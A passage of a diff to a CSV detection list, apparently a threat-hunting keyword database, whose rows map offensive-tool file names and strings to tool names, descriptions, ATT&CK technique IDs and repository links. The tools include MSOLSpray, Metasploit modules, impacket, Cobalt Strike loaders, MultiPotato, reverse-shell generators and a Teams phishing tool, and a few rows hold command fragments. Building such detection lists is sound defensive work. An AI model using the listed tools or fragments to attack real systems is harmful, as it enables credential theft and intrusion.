tools","https://github.com/dafthack/MSOLSpray","1","1","N/A","10","8","734","147","2023-02-17T13:52:21Z","2020-03-16T13:38:22Z" -"*MSOLSpray-master*","offensive_tool_keyword","MSOLSpray","This module will perform password spraying against Microsoft Online accounts (Azure/O365)","T1110.003 - T1553.003","TA0001 - TA0006","N/A","N/A","Network Exploitation tools","https://github.com/dafthack/MSOLSpray","1","1","N/A","10","8","734","147","2023-02-17T13:52:21Z","2020-03-16T13:38:22Z" +"*msol_dump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*msol_dump.ps1*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*MSOLSpray *","offensive_tool_keyword","MSOLSpray","This module will perform password spraying against Microsoft Online accounts (Azure/O365)","T1110.003 - T1553.003","TA0001 - TA0006","N/A","N/A","Network Exploitation tools","https://github.com/dafthack/MSOLSpray","1","0","N/A","10","8","735","147","2023-02-17T13:52:21Z","2020-03-16T13:38:22Z" +"*MSOLSpray.git*","offensive_tool_keyword","MSOLSpray","This module will perform password spraying against Microsoft Online accounts (Azure/O365)","T1110.003 - T1553.003","TA0001 - TA0006","N/A","N/A","Network Exploitation tools","https://github.com/dafthack/MSOLSpray","1","1","N/A","10","8","735","147","2023-02-17T13:52:21Z","2020-03-16T13:38:22Z" +"*MSOLSpray.ps1*","offensive_tool_keyword","MSOLSpray","This module will perform password spraying against Microsoft Online accounts (Azure/O365)","T1110.003 - T1553.003","TA0001 - TA0006","N/A","N/A","Network Exploitation tools","https://github.com/dafthack/MSOLSpray","1","1","N/A","10","8","735","147","2023-02-17T13:52:21Z","2020-03-16T13:38:22Z" +"*MSOLSpray-master*","offensive_tool_keyword","MSOLSpray","This module will perform password spraying against Microsoft Online accounts (Azure/O365)","T1110.003 - T1553.003","TA0001 - TA0006","N/A","N/A","Network Exploitation tools","https://github.com/dafthack/MSOLSpray","1","1","N/A","10","8","735","147","2023-02-17T13:52:21Z","2020-03-16T13:38:22Z" "*mspass.exe*","offensive_tool_keyword","mspass","MessenPass can only be used to recover the passwords for the current logged-on user on your local computer. and it only works if you chose the remember your password in one of the above programs. You cannot use this utility for grabbing the passwords of other users.","T1003 - T1016 - T1021 - T1056 - T1110 - T1212 - T1552 - T1557","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/mspass.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*mspass.zip*","offensive_tool_keyword","mspass","MessenPass can only be used to recover the passwords for the current logged-on user on your local computer. and it only works if you chose the remember your password in one of the above programs. You cannot use this utility for grabbing the passwords of other users.","T1003 - T1016 - T1021 - T1056 - T1110 - T1212 - T1552 - T1557","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/mspass.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*msquic_openssl/msquic.dll*","offensive_tool_keyword","ntlmquic","POC tools for exploring SMB over QUIC protocol","T1210.002 - T1210.003 - T1210.004","TA0001","N/A","N/A","Network Exploitation tools","https://github.com/xpn/ntlmquic","1","1","N/A","N/A","2","114","15","2022-04-06T11:22:11Z","2022-04-05T13:01:02Z" "*msquic_openssl/msquic.lib*","offensive_tool_keyword","ntlmquic","POC tools for exploring SMB over QUIC protocol","T1210.002 - T1210.003 - T1210.004","TA0001","N/A","N/A","Network Exploitation tools","https://github.com/xpn/ntlmquic","1","1","N/A","N/A","2","114","15","2022-04-06T11:22:11Z","2022-04-05T13:01:02Z" -"*MS-RPNVulnerableDC.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*MS-RPNVulnerableDC.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" "*MS-RPRN.exe *","offensive_tool_keyword","AD exploitation cheat sheet","Unconstrained delegation From attacking machine entice the Domain Controller to connect using the printer bug. Binary from here https://github.com/leechristensen/SpoolSample","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*MS-RPRN.exe \\* \\*/pipe/pwned*","offensive_tool_keyword","MultiPotato","get SYSTEM via SeImpersonate privileges","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S3cur3Th1sSh1t/MultiPotato","1","0","N/A","10","5","485","87","2021-11-20T16:20:23Z","2021-11-19T15:50:55Z" "*mssgbox_shellcode_arranged_x64.b64*","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","1","N/A","10","1","7","2","2023-09-07T08:36:28Z","2021-12-10T15:04:35Z" @@ -13810,20 +13970,20 @@ "*mssgbox_shellcode_x64.bin*","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","1","N/A","10","1","7","2","2023-09-07T08:36:28Z","2021-12-10T15:04:35Z" "*mssgbox_shellcode_x64_with_hexsymbol.txt*","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","1","N/A","10","1","7","2","2023-09-07T08:36:28Z","2021-12-10T15:04:35Z" "*mssgbox_shellcode_x64_without_hexsymbol.txt*","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","1","N/A","10","1","7","2","2023-09-07T08:36:28Z","2021-12-10T15:04:35Z" -"*mssql_brute.rc*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*mssql_local_auth_bypass.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*mssql_local_hashdump.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*mssql_brute.rc*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*mssql_local_auth_bypass.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*mssql_local_hashdump.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*mssqlattack.py*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" -"*mssqlattack.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*mssqlattack.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "*mssqlproxy-master*","offensive_tool_keyword","mssqlproxy","mssqlproxy is a toolkit aimed to perform lateral movement in restricted environments through a compromised Microsoft SQL Server via socket reuse","T1021.002 - T1071.001 - T1573.002","TA0008 - TA0011","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/blackarrowsec/mssqlproxy","1","1","N/A","10","7","682","113","2021-02-16T20:13:04Z","2020-02-12T08:44:28Z" -"*mssqlrelayclient.*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*mssqlrelayclient.*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "*mssqlrelayclient.py*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" "*mssqlsvc.kirbi*","offensive_tool_keyword","AD exploitation cheat sheet","Crack with TGSRepCrack","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*mthbernardes*rsg*","offensive_tool_keyword","rsg","A tool to generate various ways to do a reverse shell","T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007","TA0002 - TA0011 - TA0003","N/A","N/A","POST Exploitation tools","https://github.com/mthbernardes/rsg","1","1","N/A","N/A","6","541","133","2023-04-27T10:32:21Z","2017-12-12T02:57:07Z" "*mttaggart/OffensiveNotion*","offensive_tool_keyword","OffensiveNotion","Notion (yes the notetaking app) as a C2.","T1090 - T1090.002 - T1071 - T1071.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/mttaggart/OffensiveNotion","1","1","N/A","10","10","1002","111","2023-05-21T13:24:01Z","2022-01-18T16:39:54Z" -"*multi_meter_inject.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*multi_vendor_cctv_dvr_pass*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*multibit2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*multi_meter_inject.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*multi_vendor_cctv_dvr_pass*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*multibit2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*MultiPotato.cpp*","offensive_tool_keyword","MultiPotato","get SYSTEM via SeImpersonate privileges","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S3cur3Th1sSh1t/MultiPotato","1","1","N/A","10","5","485","87","2021-11-20T16:20:23Z","2021-11-19T15:50:55Z" "*MultiPotato.exe*","offensive_tool_keyword","MultiPotato","get SYSTEM via SeImpersonate privileges","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S3cur3Th1sSh1t/MultiPotato","1","1","N/A","10","5","485","87","2021-11-20T16:20:23Z","2021-11-19T15:50:55Z" "*MultiPotato-main*","offensive_tool_keyword","MultiPotato","get SYSTEM via SeImpersonate privileges","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S3cur3Th1sSh1t/MultiPotato","1","1","N/A","10","5","485","87","2021-11-20T16:20:23Z","2021-11-19T15:50:55Z" @@ -13833,121 +13993,121 @@ "*mwrlabs*","offensive_tool_keyword","Github Username","used to be a malware repo aso hosting exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/mwrlabs","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*-my.sharepoint.com/personal/Fakeuser*","offensive_tool_keyword","onedrive_user_enum","enumerate valid onedrive users","T1087 - T1110","TA0006","N/A","N/A","Network Exploitation tools","https://github.com/nyxgeek/onedrive_user_enum","1","1","N/A","N/A","5","490","73","2023-09-21T06:52:07Z","2019-03-05T08:54:38Z" "*-my.sharepoint.com/personal/TESTUSER_*","offensive_tool_keyword","onedrive_user_enum","enumerate valid onedrive users","T1087 - T1110","TA0006","N/A","N/A","Network Exploitation tools","https://github.com/nyxgeek/onedrive_user_enum","1","1","N/A","N/A","5","490","73","2023-09-21T06:52:07Z","2019-03-05T08:54:38Z" -"*my_dump_my_pe*","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1068","227","2023-09-08T10:09:19Z","2021-08-15T18:17:28Z" -"*myreallycooltotallyrealtenant.onmicrosoft.com*","offensive_tool_keyword","teamsphisher","Send phishing messages and attachments to Microsoft Teams users","T1566.001 - T1566.002 - T1204.001","TA0001 - TA0005","N/A","N/A","phishing","https://github.com/Octoberfest7/TeamsPhisher","1","1","N/A","N/A","9","831","109","2023-07-14T00:23:30Z","2023-07-03T02:19:47Z" -"*myseatbelt.py*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","8","731","94","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" +"*my_dump_my_pe*","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1070","227","2023-09-08T10:09:19Z","2021-08-15T18:17:28Z" +"*myreallycooltotallyrealtenant.onmicrosoft.com*","offensive_tool_keyword","teamsphisher","Send phishing messages and attachments to Microsoft Teams users","T1566.001 - T1566.002 - T1204.001","TA0001 - TA0005","N/A","N/A","phishing","https://github.com/Octoberfest7/TeamsPhisher","1","1","N/A","N/A","9","832","109","2023-07-14T00:23:30Z","2023-07-03T02:19:47Z" +"*myseatbelt.py*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential 